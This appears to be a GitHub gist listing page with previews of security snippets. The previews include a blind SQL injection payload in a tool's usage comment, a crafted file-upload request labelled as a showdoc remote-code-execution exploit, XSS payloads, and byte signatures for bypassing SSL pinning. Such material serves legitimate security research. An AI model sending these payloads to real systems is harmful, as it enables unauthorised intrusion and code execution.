Skip to content

Instantly share code, notes, and snippets.

View gabyavra's full-sized avatar

gabyavra

20 followers · 78 following
View GitHub Profile
@kristovatlas
kristovatlas / drozer_setup.sh
Last active February 16, 2020 11:58
Instructions for setting up drozer in MacOS 10.11 "El Capitan"
#Based on https://blog.ropnop.com/installing-drozer-on-os-x-el-capitan/
#Install recent python 2 and viritualenvwrapper
brew install python
brew upgrade python
pip install virtualenvwrapper
#At this point if you try to run mkvirtualenv, you'll get an error message. To resolve, follow the instructions indicated in /usr/local/bin/virtualenvwrapper.sh. In my current copy, they are:
# 1. Create a directory to hold the virtual environments.
# (mkdir $HOME/.virtualenvs).
@ltouroumov
ltouroumov / bbs.py
Last active July 13, 2020 13:56
Blind Binary Search (A tool for blind SQL injection)
#!/usr/bin/env python3
# bbs.py - Blind Binary Search
# Author: Laureline David
#
# Sample Usage:
#
# ./bbs.py --method POST
# --true-url http://website.com/login
# --url http://website.com/login
# --len "login=%27+union+select+login+from+users+where+length%28login%29+%3c%3d+{:d}+#&pass=abc"
@pikpikcu
pikpikcu / ev-sites.txt
Created March 24, 2021 06:38 — forked from ScottHelme/ev-sites.txt
Sites using EV in the Top 1 Million - 13th Sep 2019
14 apple.com
40 vk.com
44 github.com
49 tumblr.com
55 dropbox.com
85 medium.com
87 paypal.com
92 icloud.com
100 booking.com
112 weebly.com
@pikpikcu
pikpikcu / showdoc-rce.md
Created April 21, 2021 07:33 
POST /index.php?s=/home/page/uploadImg HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Content-Length: 239
Content-Type: multipart/form-data; boundary=--------------------------835846770881083140190633
Accept-Encoding: gzip

----------------------------835846770881083140190633
Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>php"
@btoews
btoews / example.html
Created April 16, 2012 16:52
Ultra short xss
<html>
<head>
<title>xss example</title>
<script>
//my awesome js
function a(){alert(1)}
</script>
</head>
<body>
@zeroSteiner
zeroSteiner / safeseh_inspect.py
Created December 16, 2014 18:20
Safe Exception Handler Analysis Tool
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# safeseh_inspect.py
#
# Copyright 2014 Spencer McIntyre
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
@owen800q
owen800q / boringssl.md
Created June 22, 2020 07:16
boringssl library's ssl pinning bypass

function bytes sequence signature

arm 32

2D E9 F0 4F A3 B0 81 46 50 20 10 70 D9 F8 98 70 00 2F

arm 64

FF 03 05 D1 FC 6B 0F A9 F9 63 10 A9 F7 5B 11 A9 F5 53 12 A9 F3 7B 13 A9 08 0A 80 52 48 00 00 39 16 54 40 F9 56 07 00 B4 C8 02 40 F9 08 07 00 B4 29 20 40 A9 F3 03 02 AA
@nunogoncalves
nunogoncalves / dropbox_delete_all_links.js
Last active April 4, 2022 10:16
More or less automatic way to delete all links in dropbox. Since they don't provide a way of doing so and it's very boring to delete one by one when you have hundreds of links...
@superjamie
superjamie / 2016-04-28-reversing-for-dummies.md
Last active November 10, 2022 05:46
Reversing for Dummies - Brisbane SecTalks 0x09
@m1el
m1el / xss-without-spaces
Created March 5, 2013 19:42
<img/src/onerror=alert(1)>